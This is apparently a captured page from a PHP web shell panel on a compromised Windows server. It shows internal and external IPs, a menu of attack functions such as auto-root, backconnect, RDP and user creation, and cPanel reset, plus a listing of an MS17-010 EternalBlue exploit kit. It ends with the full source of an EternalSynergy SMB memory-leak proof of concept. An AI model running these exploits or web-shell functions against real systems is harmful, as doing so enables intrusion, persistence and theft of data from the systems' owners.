Windows NT SRV-DATA 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
: 192.168.213.201 | : 216.73.216.72
Cant Read [ /etc/named.conf ]
8.2.0
ADMINISTRATEUR
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ E ]
[ Z ]
C: /
Users /
admin /
Desktop /
MS17-010-master /
[ HOME SHELL ]
Name
Size
Permission
Action
shellcode
[ DIR ]
drwxrwxrwx
BUG.txt
27.13
KB
-rw-rw-rw-
Nouveau document texte.txt
0
B
-rw-rw-rw-
README.md
3.29
KB
-rw-rw-rw-
checker.py
2.44
KB
-rw-rw-rw-
eternalblue_exploit7.py
25.12
KB
-rw-rw-rw-
eternalblue_exploit8.py
23.51
KB
-rw-rw-rw-
eternalblue_poc.py
3.71
KB
-rw-rw-rw-
eternalchampion_leak.py
1.51
KB
-rw-rw-rw-
eternalchampion_poc.py
2.53
KB
-rw-rw-rw-
eternalchampion_poc2.py
5.8
KB
-rw-rw-rw-
eternalromance_leak.py
1.61
KB
-rw-rw-rw-
eternalromance_poc.py
948
B
-rw-rw-rw-
eternalromance_poc2.py
4.99
KB
-rw-rw-rw-
eternalsynergy_leak.py
1.82
KB
-rw-rw-rw-
eternalsynergy_poc.py
2.95
KB
-rw-rw-rw-
infoleak_uninit.py
1.08
KB
-rw-rw-rw-
mysmb.py
16.28
KB
-rw-rw-rw-
mysmb.pyc
16.68
KB
-rw-rw-rw-
npp_control.py
1.8
KB
-rw-rw-rw-
pip.py
2.98
KB
-rw-rw-rw-
python
0
B
-rw-rw-rw-
smbold.py
41
KB
-rw-rw-rw-
win7.py
26.09
KB
-rw-rw-rw-
zzz_exploit.py
42.4
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : eternalsynergy_leak.py
#!/usr/bin/python from impacket import smb from mysmb import MYSMB from struct import pack import sys ''' PoC: demonstrates how NSA eternalsynergy leaks a transaction struct Note: - this PoC only test against Windows 7 x64 - all SMB request parameter is copied from capture network traffic ''' USERNAME = '' PASSWORD = '' if len(sys.argv) != 3: print("{} <ip> <pipe_name>".format(sys.argv[0])) sys.exit(1) target = sys.argv[1] pipe_name = sys.argv[2] conn = MYSMB(target) # our buffer size is 4356 bytes # transaction with large reply will be splitted to multiple response conn.login(USERNAME, PASSWORD, maxBufferSize=4356) tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$') conn.set_default_tid(tid) fid = conn.nt_create_andx(tid, pipe_name) # any valid share name should be OK # normally, small transaction is allocated from lookaside which force all buffer size to 0x5000 # the only method to get small buffer size is sending SMB_COM_TRANSACTION command with empty setup for i in range(10): conn.send_trans('', totalDataCount=0xdb0, maxSetupCount=0, maxParameterCount=0, maxDataCount=0) mid_ntrename = conn.next_mid() # create NT_TRANS_RENAME (5) request req1 = conn.create_nt_trans_packet(5, mid=mid_ntrename, param=pack('<HH', fid, 0), data='A'*0x10c0, maxParameterCount=0x3f40) # leak 0x150 bytes req2 = conn.create_nt_trans_secondary_packet(mid_ntrename, data='A'*0x150) reqs = [ conn.create_trans_packet('', totalDataCount=0x90, maxSetupCount=0, maxParameterCount=0xd00, maxDataCount=0) for i in range(8) ] conn.send_raw(req1[:-8]) conn.send_raw(req1[-8:]+req2+''.join(reqs)) data = conn.recv_transaction_data(mid_ntrename, 0x10c0+0x150) # no write parameter open('leak.dat', 'wb').write(data[4:]) print('All return data is written to leak.dat') conn.close(tid, fid) conn.disconnect_tree(tid) conn.logoff() conn.get_socket().close()
Close